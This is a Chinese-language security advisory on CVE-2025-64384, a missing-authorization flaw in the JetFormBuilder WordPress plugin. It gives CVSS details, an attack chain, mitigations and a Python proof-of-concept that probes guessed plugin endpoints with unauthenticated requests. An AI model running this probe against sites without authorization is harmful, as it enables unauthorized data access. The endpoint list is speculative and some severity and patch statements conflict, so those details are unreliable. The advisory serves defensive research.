CVE-2025-64384 JetFormBuilder WordPress插件访问控制漏洞

漏洞信息

漏洞编号

CVE-2025-64384

漏洞类型

访问控制/授权缺失

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

JetFormBuilder WordPress插件（jetmonsters）

漏洞概述

CVE-2025-64384是WordPress插件JetFormBuilder中存在的一个严重访问控制漏洞。该漏洞属于Missing Authorization类型，允许未经身份验证的攻击者利用配置错误的访问控制安全级别。由于该插件在处理某些敏感操作时未正确验证用户权限，攻击者可以通过构造特定的HTTP请求来访问本应需要授权的功能。此漏洞影响范围广泛，所有使用JetFormBuilder 3.5.3及以下版本的WordPress网站都面临风险。由于攻击无需认证且利用难度较低，攻击者可以自动化扫描并批量利用此漏洞，对大量网站构成威胁。建议受影响的用户立即升级到最新版本或采取临时缓解措施。

技术细节

该漏洞是典型的Broken Access Control（访问控制失效）问题。在JetFormBuilder插件中，某些管理功能或敏感操作端点缺少权限检查机制。攻击者可以通过以下方式利用：1) 分析插件的REST API端点或admin-ajax.php请求；2) 识别缺少current_user_can()或is_user_logged_in()等权限验证的函数；3) 直接向这些端点发送请求，无需登录或提供有效凭证即可触发相应功能。CVSS评分5.3（AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L）表明攻击复杂度低，无需特殊权限。由于机密性和完整性影响均为无/低，影响主要体现在可用性方面。攻击者可能利用此漏洞进行数据枚举、配置修改或触发其他业务逻辑问题。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者扫描目标WordPress网站，识别是否安装JetFormBuilder插件及其版本

STEP 2

步骤2: 端点识别

通过分析插件的REST API路由或ajax端点，识别缺少授权验证的敏感功能

STEP 3

步骤3: 构造请求

攻击者构造未经认证的HTTP请求，直接访问管理员功能或敏感数据接口

STEP 4

步骤4: 权限绕过

由于缺少current_user_can()等权限检查，攻击请求被服务器直接执行

STEP 5

步骤5: 数据访问/篡改

攻击者获取敏感表单数据、修改表单配置或触发未授权的业务逻辑操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-64384 PoC - JetFormBuilder Broken Access Control
# Target: WordPress site with JetFormBuilder plugin <= 3.5.3

def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2025-64384
    Missing Authorization in JetFormBuilder plugin
    """
    # Common JetFormBuilder endpoints that may lack authorization
    endpoints = [
        '/wp-json/jet-form-builder/v1/forms',
        '/wp-json/jet-form-builder/v1/field-types',
        '/wp-admin/admin-ajax.php?action=jet_fb_fetch_form',
        '/wp-admin/admin-ajax.php?action=jet_fb_save_form',
        '/wp-json/jet-form-builder/v1/notifications'
    ]
    
    vulnerable = False
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            # Send unauthenticated request
            response = requests.get(url, timeout=10)
            # Check if we get unauthorized response or actual data
            if response.status_code == 200:
                # Check if response contains sensitive data without auth
                if 'form' in response.text.lower() or 'field' in response.text.lower():
                    print(f'[+] Potentially vulnerable endpoint: {url}')
                    print(f'    Status: {response.status_code}')
                    print(f'    Response preview: {response.text[:200]}...')
                    vulnerable = True
            elif response.status_code == 401 or response.status_code == 403:
                print(f'[-] Protected endpoint: {url}')
        except requests.exceptions.RequestException as e:
            print(f'[!] Error testing {url}: {e}')
    
    return vulnerable

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('Usage: python cve-2025-64384-poc.py <target_url>')
        print('Example: python cve-2025-64384-poc.py http://example.com')
        sys.exit(1)
    
    target = sys.argv[1]
    print(f'[*] Scanning {target} for CVE-2025-64384...')
    print(f'[*] JetFormBuilder <= 3.5.3 Broken Access Control\n')
    
    if check_vulnerability(target):
        print('\n[!] Target may be vulnerable to CVE-2025-64384')
        print('[*] Recommended action: Upgrade JetFormBuilder to latest version')
    else:
        print('\n[*] No obvious vulnerabilities detected')
        print('[*] Manual testing may be required')

影响范围

JetFormBuilder <= 3.5.3

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 限制wp-admin和wp-json访问，仅允许已登录用户访问；2) 使用Web应用防火墙（WAF）规则阻止可疑的jet-form-builder请求；3) 禁用不必要的REST API端点；4) 加强WordPress整体安全配置，限制XML-RPC和admin-ajax.php的访问；5) 考虑暂时禁用JetFormBuilder插件直至完成安全更新。